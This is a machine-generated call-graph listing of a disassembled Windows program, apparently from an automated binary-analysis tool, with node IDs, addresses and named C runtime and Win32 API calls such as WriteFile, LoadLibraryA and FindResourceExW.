94648 ac0fb3 94646->94648 95206 ac103a 59 API calls 3 library calls 94647->95206 94655 ac0fd8 94648->94655 95204 ac7c0e 47 API calls __getptd_noexit 94648->95204 94651 ac1035 94651->94449 94652 ac0fbf 95205 ac6e10 8 API calls __cftoe2_l 94652->95205 94654 ac0fca 94654->94449 94655->94449 94657 abc064 94656->94657 94659 abc069 Mailbox 94656->94659 95207 abc1af 94657->95207 94665 abc077 94659->94665 95211 abc15c 48 API calls 94659->95211 94661 abf4ea 48 API calls 94663 abc108 94661->94663 94662 abc152 94662->94480 94664 abf4ea 48 API calls 94663->94664 94666 abc113 94664->94666 94665->94661 94665->94662 94666->94480 94668 ab1cf6 94667->94668 94670 ab1ba2 94667->94670 94668->94486 94669 ab1bae 94677 ab1bb9 94669->94677 95213 abc15c 48 API calls 94669->95213 94670->94669 94672 abf4ea 48 API calls 94670->94672 94673 b149c4 94672->94673 94674 abf4ea 48 API calls 94673->94674 94682 b149cf 94674->94682 94675 ab1c5d 94675->94486 94676 abf4ea 48 API calls 94678 ab1c9f 94676->94678 94677->94675 94677->94676 94679 ab1cb2 94678->94679 95212 aa2925 48 API calls 94678->95212 94679->94486 94681 abf4ea 48 API calls 94681->94682 94682->94669 94682->94681 94683->94486 94685 aabdfa 48 API calls 94684->94685 94686 aa61b1 94685->94686 94686->94601 94752 aa4214 94687->94752 94692 b14f73 94695 aa4252 84 API calls 94692->94695 94693 aa41d4 LoadLibraryExW 94762 aa4291 94693->94762 94697 b14f7a 94695->94697 94699 aa4291 3 API calls 94697->94699 94701 b14f82 94699->94701 94700 aa41fb 94700->94701 94702 aa4207 94700->94702 94788 aa44ed 94701->94788 94704 aa4252 84 API calls 94702->94704 94706 aa39fe 94704->94706 94706->94614 94711 aec396 94706->94711 94708 b14fa9 94796 aa4950 94708->94796 94710 b14fb6 94712 aa4517 83 API calls 94711->94712 94713 aec405 94712->94713 94974 aec56d 94713->94974 94716 aa44ed 64 API calls 94717 aec432 94716->94717 94718 aa44ed 64 API calls 94717->94718 94719 aec442 94718->94719 94720 aa44ed 64 API calls 94719->94720 94721 aec45d 94720->94721 94722 aa44ed 64 API calls 94721->94722 94723 aec478 94722->94723 94724 aa4517 83 API calls 94723->94724 94725 aec48f 94724->94725 94726 ac395c __malloc_crt 47 API calls 94725->94726 94727 aec496 94726->94727 94728 ac395c __malloc_crt 47 API calls 94727->94728 94729 aec4a0 94728->94729 94730 aa44ed 64 API calls 94729->94730 94731 aec4b4 94730->94731 94732 aebf5a GetSystemTimeAsFileTime 94731->94732 94733 aec4c7 94732->94733 94734 aec4dc 94733->94734 94735 aec4f1 94733->94735 94736 ac1c9d _free 47 API calls 94734->94736 94737 aec556 94735->94737 94738 aec4f7 94735->94738 94740 aec4e2 94736->94740 94739 ac1c9d _free 47 API calls 94737->94739 94980 aeb965 118 API calls __fcloseall 94738->94980 94742 aec41b 94739->94742 94743 ac1c9d _free 47 API calls 94740->94743 94742->94616 94746 aa4252 94742->94746 94743->94742 94744 aec54e 94745 ac1c9d _free 47 API calls 94744->94745 94745->94742 94747 aa425c 94746->94747 94748 aa4263 94746->94748 94981 ac35e4 94747->94981 94750 aa4272 94748->94750 94751 aa4283 FreeLibrary 94748->94751 94750->94616 94751->94750 94801 aa4339 94752->94801 94754 aa423c 94757 aa41bb 94754->94757 94758 aa4244 FreeLibrary 94754->94758 94759 ac3499 94757->94759 94758->94757 94809 ac34ae 94759->94809 94761 aa41c8 94761->94692 94761->94693 94888 aa42e4 94762->94888 94765 aa42b8 94767 aa41ec 94765->94767 94768 aa42c1 FreeLibrary 94765->94768 94769 aa4380 94767->94769 94768->94767 94770 abf4ea 48 API calls 94769->94770 94771 aa4395 94770->94771 94772 aa47b7 48 API calls 94771->94772 94773 aa43a1 ___crtGetEnvironmentStringsW 94772->94773 94774 aa43dc 94773->94774 94775 aa4499 94773->94775 94776 aa44d1 94773->94776 94777 aa4950 57 API calls 94774->94777 94896 aa406b CreateStreamOnHGlobal 94775->94896 94907 aec750 93 API calls 94776->94907 94785 aa43e5 94777->94785 94780 aa44ed 64 API calls 94780->94785 94781 aa4479 94781->94700 94783 b14ed7 94784 aa4517 83 API calls 94783->94784 94786 b14eeb 94784->94786 94785->94780 94785->94781 94785->94783 94902 aa4517 94785->94902 94787 aa44ed 64 API calls 94786->94787 94787->94781 94789 b14fc0 94788->94789 94790 aa44ff 94788->94790 94931 ac381e 94790->94931 94793 aebf5a 94951 aebdb4 94793->94951 94795 aebf70 94795->94708 94797 b15002 94796->94797 94798 aa495f 94796->94798 94956 ac3e65 94798->94956 94800 aa4967 94800->94710 94805 aa434b 94801->94805 94804 aa4321 LoadLibraryA GetProcAddress 94804->94754 94806 aa422f 94805->94806 94807 aa4354 LoadLibraryA 94805->94807 94806->94754 94806->94804 94807->94806 94808 aa4365 GetProcAddress 94807->94808 94808->94806 94811 ac34ba ___lock_fhandle 94809->94811 94810 ac34cd 94857 ac7c0e 47 API calls __getptd_noexit 94810->94857 94811->94810 94813 ac34fe 94811->94813 94828 ace4c8 94813->94828 94814 ac34d2 94858 ac6e10 8 API calls __cftoe2_l 94814->94858 94817 ac3503 94818 ac350c 94817->94818 94819 ac3519 94817->94819 94859 ac7c0e 47 API calls __getptd_noexit 94818->94859 94821 ac3543 94819->94821 94822 ac3523 94819->94822 94842 ace5e0 94821->94842 94860 ac7c0e 47 API calls __getptd_noexit 94822->94860 94824 ac34dd ___lock_fhandle @_EH4_CallFilterFunc@8 94824->94761 94829 ace4d4 ___lock_fhandle 94828->94829 94830 ac7cf4 __lock 47 API calls 94829->94830 94840 ace4e2 94830->94840 94831 ace552 94862 ace5d7 94831->94862 94832 ace559 94867 ac69d0 47 API calls __malloc_crt 94832->94867 94835 ace560 94835->94831 94837 ace56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94835->94837 94836 ace5cc ___lock_fhandle 94836->94817 94837->94831 94839 ac7d7c __mtinitlocknum 47 API calls 94839->94840 94840->94831 94840->94832 94840->94839 94865 ac4e5b 48 API calls __lock 94840->94865 94866 ac4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94840->94866 94850 ace600 __wopenfile 94842->94850 94843 ace61a 94872 ac7c0e 47 API calls __getptd_noexit 94843->94872 94845 ace61f 94873 ac6e10 8 API calls __cftoe2_l 94845->94873 94847 ac354e 94861 ac3570 LeaveCriticalSection LeaveCriticalSection _fprintf 94847->94861 94848 ace838 94869 ad63c9 94848->94869 94850->94843 94856 ace7d5 94850->94856 94874 ac185b 59 API calls 2 library calls 94850->94874 94852 ace7ce 94852->94856 94875 ac185b 59 API calls 2 library calls 94852->94875 94854 ace7ed 94854->94856 94876 ac185b 59 API calls 2 library calls 94854->94876 94856->94843 94856->94848 94857->94814 94858->94824 94859->94824 94860->94824 94861->94824 94868 ac7e58 LeaveCriticalSection 94862->94868 94864 ace5de 94864->94836 94865->94840 94866->94840 94867->94835 94868->94864 94877 ad5bb1 94869->94877 94871 ad63e2 94871->94847 94872->94845 94873->94847 94874->94852 94875->94854 94876->94856 94878 ad5bbd ___lock_fhandle 94877->94878 94879 ad5bcf 94878->94879 94882 ad5c06 94878->94882 94880 ac7c0e __cftoe2_l 47 API calls 94879->94880 94881 ad5bd4 94880->94881 94883 ac6e10 __cftoe2_l 8 API calls 94881->94883 94884 ad5c78 __wsopen_helper 110 API calls 94882->94884 94887 ad5bde ___lock_fhandle 94883->94887 94885 ad5c23 94884->94885 94886 ad5c4c __wsopen_helper LeaveCriticalSection 94885->94886 94886->94887 94887->94871 94892 aa42f6 94888->94892 94891 aa42cc LoadLibraryA GetProcAddress 94891->94765 94893 aa42aa 94892->94893 94894 aa42ff LoadLibraryA 94892->94894 94893->94765 94893->94891 94894->94893 94895 aa4310 GetProcAddress 94894->94895 94895->94893 94897 aa4085 FindResourceExW 94896->94897 94899 aa40a2 94896->94899 94898 b14f16 LoadResource 94897->94898 94897->94899 94898->94899 94900 b14f2b SizeofResource 94898->94900 94899->94774 94900->94899 94901 b14f3f LockResource 94900->94901 94901->94899 94903 b14fe0 94902->94903 94904 aa4526 94902->94904 94908 ac3a8d 94904->94908 94906 aa4534 94906->94785 94907->94774 94912 ac3a99 ___lock_fhandle 94908->94912 94909 ac3aa7 94921 ac7c0e 47 API calls __getptd_noexit 94909->94921 94911 ac3acd 94923 ac4e1c 94911->94923 94912->94909 94912->94911 94913 ac3aac 94922 ac6e10 8 API calls __cftoe2_l 94913->94922 94916 ac3ad3 94929 ac39fe 81 API calls 5 library calls 94916->94929 94918 ac3ae2 94930 ac3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94918->94930 94920 ac3ab7 ___lock_fhandle 94920->94906 94921->94913 94922->94920 94924 ac4e2c 94923->94924 94925 ac4e4e EnterCriticalSection 94923->94925 94924->94925 94927 ac4e34 94924->94927 94926 ac4e44 94925->94926 94926->94916 94928 ac7cf4 __lock 47 API calls 94927->94928 94928->94926 94929->94918 94930->94920 94934 ac3839 94931->94934 94933 aa4510 94933->94793 94935 ac3845 ___lock_fhandle 94934->94935 94936 ac3888 94935->94936 94937 ac385b _memset 94935->94937 94939 ac3880 ___lock_fhandle 94935->94939 94938 ac4e1c __lock_file 48 API calls 94936->94938 94947 ac7c0e 47 API calls __getptd_noexit 94937->94947 94940 ac388e 94938->94940 94939->94933 94949 ac365b 62 API calls 5 library calls 94940->94949 94943 ac3875 94948 ac6e10 8 API calls __cftoe2_l 94943->94948 94944 ac38a4 94950 ac38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94944->94950 94947->94943 94948->94939 94949->94944 94950->94939 94954 ac344a GetSystemTimeAsFileTime 94951->94954 94953 aebdc3 94953->94795 94955 ac3478 __aulldiv 94954->94955 94955->94953 94957 ac3e71 ___lock_fhandle 94956->94957 94958 ac3e7f 94957->94958 94959 ac3e94 94957->94959 94970 ac7c0e 47 API calls __getptd_noexit 94958->94970 94961 ac4e1c __lock_file 48 API calls 94959->94961 94963 ac3e9a 94961->94963 94962 ac3e84 94971 ac6e10 8 API calls __cftoe2_l 94962->94971 94972 ac3b0c 55 API calls 5 library calls 94963->94972 94966 ac3ea5 94973 ac3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94966->94973 94968 ac3eb7 94969 ac3e8f ___lock_fhandle 94968->94969 94969->94800 94970->94962 94971->94969 94972->94966 94973->94968 94975 aec581 __tzset_nolock _wcscmp 94974->94975 94976 aa44ed 64 API calls 94975->94976 94977 aec417 94975->94977 94978 aebf5a GetSystemTimeAsFileTime 94975->94978 94979 aa4517 83 API calls 94975->94979 94976->94975 94977->94716 94977->94742 94978->94975 94979->94975 94980->94744 94982 ac35f0 ___lock_fhandle 94981->94982 94983 ac361c 94982->94983 94984 ac3604 94982->94984 94986 ac4e1c __lock_file 48 API calls 94983->94986 94990 ac3614 ___lock_fhandle 94983->94990 95010 ac7c0e 47 API calls __getptd_noexit 94984->95010 94988 ac362e 94986->94988 94987 ac3609 95011 ac6e10 8 API calls __cftoe2_l 94987->95011 94994 ac3578 94988->94994 94990->94748 94995 ac359b 94994->94995 94996 ac3587 94994->94996 95008 ac3597 94995->95008 95013 ac2c84 94995->95013 95053 ac7c0e 47 API calls __getptd_noexit 94996->95053 94998 ac358c 95054 ac6e10 8 API calls __cftoe2_l 94998->95054 95005 ac35b5 95030 ace9d2 95005->95030 95007 ac35bb 95007->95008 95009 ac1c9d _free 47 API calls 95007->95009 95012 ac3653 LeaveCriticalSection LeaveCriticalSection _fprintf 95008->95012 95009->95008 95010->94987 95011->94990 95012->94990 95014 ac2cbb 95013->95014 95015 ac2c97 95013->95015 95019 aceb36 95014->95019 95015->95014 95016 ac2933 __fclose_nolock 47 API calls 95015->95016 95017 ac2cb4 95016->95017 95055 acaf61 95017->95055 95020 ac35af 95019->95020 95021 aceb43 95019->95021 95023 ac2933 95020->95023 95021->95020 95022 ac1c9d _free 47 API calls 95021->95022 95022->95020 95024 ac293d 95023->95024 95025 ac2952 95023->95025 95161 ac7c0e 47 API calls __getptd_noexit 95024->95161 95025->95005 95027 ac2942 95162 ac6e10 8 API calls __cftoe2_l 95027->95162 95029 ac294d 95029->95005 95031 ace9de ___lock_fhandle 95030->95031 95032 ace9fe 95031->95032 95033 ace9e6 95031->95033 95035 acea7b 95032->95035 95040 acea28 95032->95040 95178 ac7bda 47 API calls __getptd_noexit 95033->95178 95182 ac7bda 47 API calls __getptd_noexit 95035->95182 95036 ace9eb 95179 ac7c0e 47 API calls __getptd_noexit 95036->95179 95039 acea80 95183 ac7c0e 47 API calls __getptd_noexit 95039->95183 95043 aca8ed ___lock_fhandle 49 API calls 95040->95043 95041 ace9f3 ___lock_fhandle 95041->95007 95045 acea2e 95043->95045 95044 acea88 95184 ac6e10 8 API calls __cftoe2_l 95044->95184 95047 acea4c 95045->95047 95048 acea41 95045->95048 95180 ac7c0e 47 API calls __getptd_noexit 95047->95180 95163 acea9c 95048->95163 95051 acea47 95181 acea73 LeaveCriticalSection __unlock_fhandle 95051->95181 95053->94998 95054->95008 95056 acaf6d ___lock_fhandle 95055->95056 95057 acaf75 95056->95057 95060 acaf8d 95056->95060 95153 ac7bda 47 API calls __getptd_noexit 95057->95153 95059 acb022 95158 ac7bda 47 API calls __getptd_noexit 95059->95158 95060->95059 95063 acafbf 95060->95063 95062 acaf7a 95154 ac7c0e 47 API calls __getptd_noexit 95062->95154 95080 aca8ed 95063->95080 95064 acb027 95159 ac7c0e 47 API calls __getptd_noexit 95064->95159 95068 acafc5 95070 acafd8 95068->95070 95071 acafeb 95068->95071 95069 acb02f 95160 ac6e10 8 API calls __cftoe2_l 95069->95160 95089 acb043 95070->95089 95155 ac7c0e 47 API calls __getptd_noexit 95071->95155 95074 acaf82 ___lock_fhandle 95074->95014 95076 acafe4 95157 acb01a LeaveCriticalSection __unlock_fhandle 95076->95157 95077 acaff0 95156 ac7bda 47 API calls __getptd_noexit 95077->95156 95081 aca8f9 ___lock_fhandle 95080->95081 95082 aca946 EnterCriticalSection 95081->95082 95083 ac7cf4 __lock 47 API calls 95081->95083 95084 aca96c ___lock_fhandle 95082->95084 95085 aca91d 95083->95085 95084->95068 95086 aca928 InitializeCriticalSectionAndSpinCount 95085->95086 95087 aca93a 95085->95087 95086->95087 95088 aca970 ___lock_fhandle LeaveCriticalSection 95087->95088 95088->95082 95090 acb050 __ftell_nolock 95089->95090 95091 acb0ac 95090->95091 95092 acb08d 95090->95092 95122 acb082 95090->95122 95096 acb105 95091->95096 95097 acb0e9 95091->95097 95093 ac7bda __dosmaperr 47 API calls 95092->95093 95095 acb092 95093->95095 95094 aca70c __cftoe2_l 6 API calls 95098 acb86b 95094->95098 95099 ac7c0e __cftoe2_l 47 API calls 95095->95099 95100 acb11c 95096->95100 95103 acf82f __lseeki64_nolock 49 API calls 95096->95103 95101 ac7bda __dosmaperr 47 API calls 95097->95101 95098->95076 95102 acb099 95099->95102 95104 ad3bf2 __flswbuf 47 API calls 95100->95104 95105 acb0ee 95101->95105 95106 ac6e10 __cftoe2_l 8 API calls 95102->95106 95103->95100 95107 acb12a 95104->95107 95108 ac7c0e __cftoe2_l 47 API calls 95105->95108 95106->95122 95109 acb44b 95107->95109 95115 ac7a0d ____lc_codepage_func 47 API calls 95107->95115 95110 acb0f5 95108->95110 95111 acb7b8 WriteFile 95109->95111 95112 acb463 95109->95112 95113 ac6e10 __cftoe2_l 8 API calls 95110->95113 95114 acb7e1 GetLastError 95111->95114 95124 acb410 95111->95124 95116 acb55a 95112->95116 95121 acb479 95112->95121 95113->95122 95114->95124 95117 acb150 GetConsoleMode 95115->95117 95127 acb663 95116->95127 95130 acb565 95116->95130 95117->95109 95119 acb189 95117->95119 95118 acb81b 95118->95122 95123 ac7c0e __cftoe2_l 47 API calls 95118->95123 95119->95109 95125 acb199 GetConsoleCP 95119->95125 95120 acb4e9 WriteFile 95120->95114 95126 acb526 95120->95126 95121->95118 95121->95120 95122->95094 95128 acb843 95123->95128 95124->95118 95124->95122 95129 acb7f7 95124->95129 95125->95124 95150 acb1c2 95125->95150 95126->95121 95126->95124 95138 acb555 95126->95138 95127->95118 95131 acb6d8 WideCharToMultiByte 95127->95131 95132 ac7bda __dosmaperr 47 API calls 95128->95132 95133 acb7fe 95129->95133 95134 acb812 95129->95134 95130->95118 95135 acb5de WriteFile 95130->95135 95131->95114 95145 acb71f 95131->95145 95132->95122 95139 ac7c0e __cftoe2_l 47 API calls 95133->95139 95136 ac7bed __dosmaperr 47 API calls 95134->95136 95135->95114 95137 acb62d 95135->95137 95136->95122 95137->95124 95137->95130 95137->95138 95138->95124 95141 acb803 95139->95141 95140 acb727 WriteFile 95143 acb77a GetLastError 95140->95143 95140->95145 95144 ac7bda __dosmaperr 47 API calls 95141->95144 95142 ac1688 __chsize_nolock 57 API calls 95142->95150 95143->95145 95144->95122 95145->95124 95145->95127 95145->95138 95145->95140 95146 acb28f WideCharToMultiByte 95146->95124 95149 acb2ca WriteFile 95146->95149 95147 ad40f7 59 API calls __chsize_nolock 95147->95150 95148 acb2f6 95148->95114 95148->95124 95148->95150 95151 ad5884 WriteConsoleW CreateFileW __chsize_nolock 95148->95151 95152 acb321 WriteFile 95148->95152 95149->95114 95149->95148 95150->95124 95150->95142 95150->95146 95150->95147 95150->95148 95151->95148 95152->95114 95152->95148 95153->95062 95154->95074 95155->95077 95156->95076 95157->95074 95158->95064 95159->95069 95160->95074 95161->95027 95162->95029 95185 acaba4 95163->95185 95165 aceb00 95198 acab1e 48 API calls 2 library calls 95165->95198 95167 aceaaa 95167->95165 95168 acaba4 __chsize_nolock 47 API calls 95167->95168 95177 aceade 95167->95177 95172 acead5 95168->95172 95169 acaba4 __chsize_nolock 47 API calls 95173 aceaea CloseHandle 95169->95173 95170 aceb08 95171 aceb2a 95170->95171 95199 ac7bed 47 API calls 3 library calls 95170->95199 95171->95051 95176 acaba4 __chsize_nolock 47 API calls 95172->95176 95173->95165 95174 aceaf6 GetLastError 95173->95174 95174->95165 95176->95177 95177->95165 95177->95169 95178->95036 95179->95041 95180->95051 95181->95041 95182->95039 95183->95044 95184->95041 95186 acabaf 95185->95186 95187 acabc4 95185->95187 95188 ac7bda __dosmaperr 47 API calls 95186->95188 95190 ac7bda __dosmaperr 47 API calls 95187->95190 95192 acabe9 95187->95192 95189 acabb4 95188->95189 95191 ac7c0e __cftoe2_l 47 API calls 95189->95191 95193 acabf3 95190->95193 95194 acabbc 95191->95194 95192->95167 95195 ac7c0e __cftoe2_l 47 API calls 95193->95195 95194->95167 95196 acabfb 95195->95196 95197 ac6e10 __cftoe2_l 8 API calls 95196->95197 95197->95194 95198->95170 95199->95171 95200->94628 95201->94638 95202->94638 95203->94639 95204->94652 95205->94654 95206->94651 95208 abc1b8 95207->95208 95209 abc1c7 95207->95209 95210 abf4ea 48 API calls 95208->95210 95209->94659 95210->95209 95211->94665 95212->94679 95213->94677 95215 acf8a0 __ftell_nolock 95214->95215 95216 aa40b4 GetLongPathNameW 95215->95216 95217 aa6a63 48 API calls 95216->95217 95218 aa40dc 95217->95218 95219 aa49a0 95218->95219 95220 aad7f7 48 API calls 95219->95220 95221 aa49b2 95220->95221 95222 aa660f 49 API calls 95221->95222 95223 aa49bd 95222->95223 95224 aa49c8 95223->95224 95225 b12e35 95223->95225 95227 aa64cf 48 API calls 95224->95227 95230 b12e4f 95225->95230 95272 abd35e 60 API calls 95225->95272 95228 aa49d4 95227->95228 95266 aa28a6 95228->95266 95231 aa49e7 Mailbox 95231->94504 95233 aa41a9 136 API calls 95232->95233 95234 aa415e 95233->95234 95235 b13489 95234->95235 95237 aa41a9 136 API calls 95234->95237 95236 aec396 122 API calls 95235->95236 95238 b1349e 95236->95238 95239 aa4172 95237->95239 95240 b134a2 95238->95240 95241 b134bf 95238->95241 95239->95235 95242 aa417a 95239->95242 95243 aa4252 84 API calls 95240->95243 95244 abf4ea 48 API calls 95241->95244 95245 b134aa 95242->95245 95246 aa4186 95242->95246 95243->95245 95265 b13504 Mailbox 95244->95265 95361 ae6b49 87 API calls _wprintf 95245->95361 95273 aac833 95246->95273 95250 b134b8 95250->95241 95251 b136b4 95252 ac1c9d _free 47 API calls 95251->95252 95253 b136bc 95252->95253 95254 aa4252 84 API calls 95253->95254 95259 b136c5 95254->95259 95258 ac1c9d _free 47 API calls 95258->95259 95259->95258 95260 aa4252 84 API calls 95259->95260 95367 ae25b5 86 API calls 4 library calls 95259->95367 95260->95259 95262 aace19 48 API calls 95262->95265 95265->95251 95265->95259 95265->95262 95362 ae2551 48 API calls ___crtGetEnvironmentStringsW 95265->95362 95363 ae2472 60 API calls 2 library calls 95265->95363 95364 ae9c12 48 API calls 95265->95364 95365 aaba85 48 API calls ___crtGetEnvironmentStringsW 95265->95365 95366 aa4dd9 48 API calls 95265->95366 95267 aa28b8 95266->95267 95271 aa28d7 ___crtGetEnvironmentStringsW 95266->95271 95270 abf4ea 48 API calls 95267->95270 95268 abf4ea 48 API calls 95269 aa28ee 95268->95269 95269->95231 95270->95271 95271->95268 95272->95225 95274 aac843 __ftell_nolock 95273->95274 95275 b13095 95274->95275 95276 aac860 95274->95276 95392 ae25b5 86 API calls 4 library calls 95275->95392 95373 aa48ba 49 API calls 95276->95373 95279 b130a8 95393 ae25b5 86 API calls 4 library calls 95279->95393 95280 aac882 95374 aa4550 56 API calls 95280->95374 95282 aac897 95282->95279 95284 aac89f 95282->95284 95286 aad7f7 48 API calls 95284->95286 95285 b130c4 95289 aac90c 95285->95289 95287 aac8ab 95286->95287 95375 abe968 49 API calls __ftell_nolock 95287->95375 95291 aac91a 95289->95291 95292 b130d7 95289->95292 95290 aac8b7 95293 aad7f7 48 API calls 95290->95293 95378 ac1dfc 95291->95378 95295 aa4907 CloseHandle 95292->95295 95296 aac8c3 95293->95296 95297 b130e3 95295->95297 95299 aa660f 49 API calls 95296->95299 95298 aa41a9 136 API calls 95297->95298 95300 b1310d 95298->95300 95301 aac8d1 95299->95301 95302 b13136 95300->95302 95306 aec396 122 API calls 95300->95306 95376 abeb66 SetFilePointerEx ReadFile 95301->95376 95394 ae25b5 86 API calls 4 library calls 95302->95394 95304 aac943 _wcscat _wcscpy 95305 aac96d SetCurrentDirectoryW 95304->95305 95309 abf4ea 48 API calls 95305->95309 95310 b13129 95306->95310 95307 aac8fd 95377 aa46ce SetFilePointerEx SetFilePointerEx 95307->95377 95313 aac988 95309->95313 95314 b13131 95310->95314 95315 b13152 95310->95315 95312 b1314d 95321 aacad1 Mailbox 95312->95321 95316 aa47b7 48 API calls 95313->95316 95317 aa4252 84 API calls 95314->95317 95318 aa4252 84 API calls 95315->95318 95319 aac993 Mailbox __NMSG_WRITE 95316->95319 95317->95302 95320 b13157 95318->95320 95323 aaca9d 95319->95323 95334 b13467 95319->95334 95343 b1345f 95319->95343 95345 aace19 48 API calls 95319->95345 95381 aab337 56 API calls _wcscpy 95319->95381 95382 abc258 GetStringTypeW 95319->95382 95383 aacb93 59 API calls __wcsnicmp 95319->95383 95384 aacb5a GetStringTypeW __NMSG_WRITE 95319->95384 95385 ac16d0 GetStringTypeW wcstoxq 95319->95385 95386 aacc24 162 API calls 3 library calls 95319->95386 95387 abc682 48 API calls 95319->95387 95322 abf4ea 48 API calls 95320->95322 95368 aa48dd 95321->95368 95324 b13194 95322->95324 95388 aa4907 95323->95388 95395 aaba85 48 API calls ___crtGetEnvironmentStringsW 95324->95395 95328 aacaa9 SetCurrentDirectoryW 95328->95321 95329 aa3d98 95329->94378 95329->94404 95333 b133ce 95401 ae9b72 48 API calls 95333->95401 95405 ae25b5 86 API calls 4 library calls 95334->95405 95337 b13480 95337->95323 95339 b133f0 95402 b029e8 48 API calls ___crtGetEnvironmentStringsW 95339->95402 95341 b133fd 95344 ac1c9d _free 47 API calls 95341->95344 95404 ae240b 48 API calls 3 library calls 95343->95404 95344->95321 95345->95319 95352 aace19 48 API calls 95358 b131dd Mailbox 95352->95358 95355 b13420 95403 ae25b5 86 API calls 4 library calls 95355->95403 95357 b13439 95359 ac1c9d _free 47 API calls 95357->95359 95358->95333 95358->95352 95358->95355 95396 ae2551 48 API calls ___crtGetEnvironmentStringsW 95358->95396 95397 ae2472 60 API calls 2 library calls 95358->95397 95398 ae9c12 48 API calls 95358->95398 95399 aaba85 48 API calls ___crtGetEnvironmentStringsW 95358->95399 95400 abc682 48 API calls 95358->95400 95360 b1344c 95359->95360 95360->95321 95361->95250 95362->95265 95363->95265 95364->95265 95365->95265 95366->95265 95367->95259 95369 aa4907 CloseHandle 95368->95369 95370 aa48e5 Mailbox 95369->95370 95371 aa4907 CloseHandle 95370->95371 95372 aa48fc 95371->95372 95372->95329 95373->95280 95374->95282 95375->95290 95376->95307 95377->95289 95406 ac1e46 95378->95406 95381->95319 95382->95319 95383->95319 95384->95319 95385->95319 95386->95319 95387->95319 95389 aa4920 95388->95389 95390 aa4911 95388->95390 95389->95390 95391 aa4925 CloseHandle 95389->95391 95390->95328 95391->95390 95392->95279 95393->95285 95394->95312 95395->95358 95396->95358 95397->95358 95398->95358 95399->95358 95400->95358 95401->95339 95402->95341 95403->95357 95404->95334 95405->95337 95407 ac1e61 95406->95407 95410 ac1e55 95406->95410 95430 ac7c0e 47 API calls __getptd_noexit 95407->95430 95409 ac2019 95412 ac1e41 95409->95412 95431 ac6e10 8 API calls __cftoe2_l 95409->95431 95410->95407 95421 ac1ed4 95410->95421 95425 ac9d6b 47 API calls __cftoe2_l 95410->95425 95412->95304 95414 ac1fa0 95414->95407 95414->95412 95416 ac1fb0 95414->95416 95415 ac1f5f 95415->95407 95422 ac1f7b 95415->95422 95427 ac9d6b 47 API calls __cftoe2_l 95415->95427 95429 ac9d6b 47 API calls __cftoe2_l 95416->95429 95418 ac1f41 95418->95414 95418->95415 95420 ac1f91 95428 ac9d6b 47 API calls __cftoe2_l 95420->95428 95421->95407 95421->95418 95426 ac9d6b 47 API calls __cftoe2_l 95421->95426 95422->95407 95422->95412 95422->95420 95425->95421 95426->95418 95427->95422 95428->95412 95429->95412 95430->95409 95431->95412 95433 aa4c8b 95432->95433 95437 aa4d94 95432->95437 95434 abf4ea 48 API calls 95433->95434 95433->95437 95435 aa4cb2 95434->95435 95436 abf4ea 48 API calls 95435->95436 95442 aa4d22 95436->95442 95437->94510 95442->95437 95463 aab470 95442->95463 95491 aa4dd9 48 API calls 95442->95491 95492 ae9af1 48 API calls 95442->95492 95493 aaba85 48 API calls ___crtGetEnvironmentStringsW 95442->95493 95446 aa59b2 95443->95446 95444 aa5c7e 95504 aa5f85 86 API calls 95444->95504 95446->95444 95447 aa5be7 95446->95447 95448 aa5d71 95446->95448 95503 aa5f85 86 API calls 95446->95503 95447->94512 95505 aecc5c 86 API calls 4 library calls 95448->95505 95452 aad7f7 48 API calls 95451->95452 95461 aa57a9 95452->95461 95453 aa585c 95527 aa3b12 48 API calls 95453->95527 95455 aa5879 95528 aecc5c 86 API calls 4 library calls 95455->95528 95456 aa6eed 48 API calls 95456->95461 95457 aa5866 Mailbox 95457->94514 95459 aace19 48 API calls 95459->95461 95461->95453 95461->95455 95461->95456 95461->95457 95461->95459 95506 aabd30 95461->95506 95511 aa66d1 95461->95511 95464 aa6b0f 48 API calls 95463->95464 95484 aab495 95464->95484 95465 aab69b 95496 aaba85 48 API calls ___crtGetEnvironmentStringsW 95465->95496 95467 aab6b5 Mailbox 95467->95442 95470 b1397b 95500 ae26bc 88 API calls 4 library calls 95470->95500 95471 aabcce 48 API calls 95471->95484 95472 aaba85 48 API calls 95472->95484 95475 aab9e4 95502 ae26bc 88 API calls 4 library calls 95475->95502 95476 b13973 95476->95467 95479 b13989 95501 aaba85 48 API calls ___crtGetEnvironmentStringsW 95479->95501 95481 b13909 95483 aa6b4a 48 API calls 95481->95483 95482 aabb85 48 API calls 95482->95484 95485 b13914 95483->95485 95484->95465 95484->95470 95484->95471 95484->95472 95484->95475 95484->95481 95484->95482 95487 aabdfa 48 API calls 95484->95487 95490 b13939 ___crtGetEnvironmentStringsW 95484->95490 95494 aac413 59 API calls 95484->95494 95495 aabc74 48 API calls 95484->95495 95497 aac6a5 49 API calls 95484->95497 95498 aac799 48 API calls ___crtGetEnvironmentStringsW 95484->95498 95489 abf4ea 48 API calls 95485->95489 95488 aab66c CharUpperBuffW 95487->95488 95488->95484 95489->95490 95499 ae26bc 88 API calls 4 library calls 95490->95499 95491->95442 95492->95442 95493->95442 95494->95484 95495->95484 95496->95467 95497->95484 95498->95484 95499->95476 95500->95479 95501->95476 95502->95476 95503->95446 95504->95447 95505->95447 95507 aabd3f 95506->95507 95510 aabd5a 95506->95510 95508 aabdfa 48 API calls 95507->95508 95509 aabd47 CharUpperBuffW 95508->95509 95509->95510 95510->95461 95512 aad7f7 48 API calls 95511->95512 95513 aa66e2 95512->95513 95514 aad7f7 48 API calls 95513->95514 95525 aa6711 95514->95525 95515 aa684d 95519 aa6864 95515->95519 95524 aa6914 95515->95524 95517 aa6eed 48 API calls 95517->95525 95518 b15e73 95518->95461 95519->95518 95520 aa6eed 48 API calls 95519->95520 95521 aa6880 95520->95521 95529 aa5476 95521->95529 95523 aa64cf 48 API calls 95523->95525 95540 aecc5c 86 API calls 4 library calls 95524->95540 95525->95515 95525->95517 95525->95523 95525->95524 95526 aa68b0 Mailbox 95526->95461 95527->95457 95528->95457 95530 aa54bf 95529->95530 95531 aa5482 95529->95531 95530->95526 95532 abf4ea 48 API calls 95531->95532 95533 aa548a 95532->95533 95534 aa5498 95533->95534 95535 aad7f7 48 API calls 95533->95535 95541 aa53bc 48 API calls 95534->95541 95535->95534 95540->95518 95543 aa403c LoadImageW 95542->95543 95544 b1418d EnumResourceNamesW 95542->95544 95545 aa3ee1 RegisterClassExW 95543->95545 95544->95545 95546 aa3f53 7 API calls 